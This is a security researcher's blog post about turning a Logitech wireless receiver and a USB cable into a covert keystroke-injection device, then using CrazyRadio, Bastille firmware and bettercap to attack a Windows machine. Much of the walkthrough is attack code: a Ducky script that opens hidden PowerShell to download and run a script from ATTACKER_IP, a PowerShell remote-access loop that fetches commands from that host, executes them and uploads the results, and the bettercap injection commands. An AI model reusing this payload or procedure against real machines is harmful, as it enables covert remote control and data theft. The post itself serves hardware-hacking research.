Gone in 30 seconds – a HID cable story tale

Following what I mentioned in my previous post, I went to my electronics bin and gathered a Logitech Wireless mouse (M185) and a USB cable.

On the mouse, I took the receiver – a Logitech Unifying Receiver CU0010 (nRF24L family):

And cut one of the sides of a random USB cable:

Split the wires:

Removed the cap from the Logitech receiver:

Solder (really need to improve my soldering skills) the wires (GND, Data+, Data- and VCC) into the receiver:

Put the USB connector cap on:

Add a nice plastic USB enclosure to make it more real:

All the process was fast, I took around 5 minutes to cut, solder and super-glue all together. In the end I think it could be better, specially when I rammed the USB connector with a knife.

For the second part it took a little more because I wanted to use another alternative to the existing HID cables – so I went with CrazyRadio + Bastille firmware and a final touch of bettercap HID module to send my Ducky payload. I wanted to take advantage of what I had and that’s it.

This is basically a walkthrough of what I did:

  • Write down the MAC address of the device (using HID.recon from bettercap or by checking the properties of the device – this will depend on your OS)
  • Write your Ducky payload – in this PoC is just a reverse shell to my VPS

[code]DELAY 750
STRING powershell -NoP -NonI -Exec Bypass -W hidden "IEX (New-Object System.Net.WebClient).DownloadString(‘http://ATTACKER_IP/ps.txt’)"
DELAY 750[/code]

[code]function getUser() {
$string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
$string = $string.Trim()
return $string

function getComputerName() {
$string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
$string = $string.Trim()
return $string

$resp = "http://ATTACKER_IP:8000/rat"
$w = New-Object Net.WebClient
while($true) {
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
$r_get = $w.DownloadString($resp)
$d = [System.Convert]::FromBase64String($r_get);
$Ds = [System.Text.Encoding]::UTF8.GetString($d);

while($r_get) {
$output = invoke-expression $Ds | out-string
$w.UploadString($resp, $output)

  • Connect the HID cable on the Windows victim machine (don’t forget that the payload will be OS dependable)
  • Start your listener on the attacker machine
  • Connect CrazyRadio and start bettercap

[code]bettercap -eval="hid.recon on"
hid.inject MAC PT ducky.txt

And its basically game-over.
I did a short video to illustrate the PoC – https://www.youtube.com/watch?v=y9C-4bcgmIU.

In the process of creating this HID cable with “leftovers” I learn a few things:

  • Some Logitech Unifying receivers are not vulnerable to some known attacks – like keystroke injection;
  • Be careful when putting solder on the USB contacts. Just put a small amount and spread it slightly with your iron, that way the PCB will fit better on the USB connector;
  • Do a first run on a USB hub just to make sure you don’t burn your laptop port or something;
  • Don’t waste money buying expensive HID cables (specially when ripped from others) when you can make your own for less that $10;
  • Last point, don’t keep your brain focused on doing what others do and don’t be afraid do fail at first. Be persistent and never quit.

By David Sopas